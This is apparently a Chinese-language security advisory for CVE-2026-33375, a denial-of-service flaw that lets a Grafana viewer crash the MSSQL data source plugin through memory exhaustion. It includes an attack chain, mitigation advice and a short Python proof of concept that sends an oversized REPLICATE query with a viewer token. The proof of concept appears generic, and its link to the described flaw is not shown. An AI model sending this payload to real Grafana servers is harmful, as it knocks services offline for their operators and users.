CVE-2026-33375 CVSS 6.5 中危

CVE-2026-33375 Grafana MSSQL插件内存耗尽漏洞

披露日期: 2026-03-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33375

漏洞类型

拒绝服务

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Grafana MSSQL 数据源插件

漏洞概述

CVE-2026-33375 是 Grafana MSSQL 数据源插件中的逻辑缺陷漏洞。该漏洞允许低权限用户（如查看者）绕过 API 限制，发起攻击触发灾难性内存耗尽（OOM），导致宿主容器崩溃及服务拒绝。攻击无需用户交互，通过网络即可进行，CVSS 评分 6.5，严重威胁系统可用性。

技术细节

该漏洞源于 Grafana MSSQL 数据源插件在处理特定 API 请求时存在逻辑缺陷，未对低权限用户的资源消耗进行严格限制。通常情况下，查看者角色不应执行高资源消耗操作，但该缺陷允许绕过此安全限制。攻击者利用此漏洞可发送特制的恶意请求，强制插件分配过量内存或处理超大数据集。由于缺乏有效的内存分配上限与查询超时控制，此类请求会迅速耗尽容器内存，触发操作系统的 OOM Killer 机制。这会强制终止 Grafana 进程，导致服务实例崩溃并重启。攻击者无需高权限，仅需网络访问即可发起攻击，对系统可用性造成严重影响。

攻击链分析

STEP 1

侦察

攻击者识别出目标正在使用 Grafana，并启用了 MSSQL 数据源插件。

STEP 2

获取低权限账号

攻击者注册或获取一个具有“Viewer”（查看者）角色的低权限账号。

STEP 3

发起攻击

利用逻辑缺陷，攻击者使用该低权限 Token 向 MSSQL 数据源 API 发送特制的恶意请求，旨在消耗大量内存。

STEP 4

系统崩溃

服务器处理该请求时内存被耗尽，触发 OOM Killer，导致 Grafana 容器崩溃，服务不可用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "http://target-grafana:3000/api/datasources/proxy/uid/{datasource_uid}"
viewer_token = "eyJrIjoi..." # Low-privilege Viewer token

# Malicious payload designed to exhaust memory
# Exploits the logic flaw to bypass API restrictions
payload = {
    "rawSql": "SELECT REPLICATE(CAST('A' AS VARCHAR(MAX)), 10000000) AS MemoryHog", 
    "format": "json"
}

headers = {
    "Authorization": f"Bearer {viewer_token}",
    "Content-Type": "application/json"
}

def trigger_oom():
    print("[*] Attempting to trigger OOM on Grafana MSSQL plugin...")
    try:
        # Send request that bypasses restrictions and allocates massive memory
        response = requests.post(target_url, json=payload, headers=headers)
        if response.status_code == 200:
            print("[+] Request sent successfully, check host for crash/OOM.")
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    trigger_oom()

影响范围

Grafana MSSQL 数据源插件 < 具体受影响版本请参考官方安全公告

防御指南

临时缓解措施

在应用补丁之前，建议暂时禁用 MSSQL 数据源插件，或撤销非管理员用户对数据源的写入/查询权限。同时，应在容器层面配置内存上限，防止单个容器耗尽宿主机全部资源。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表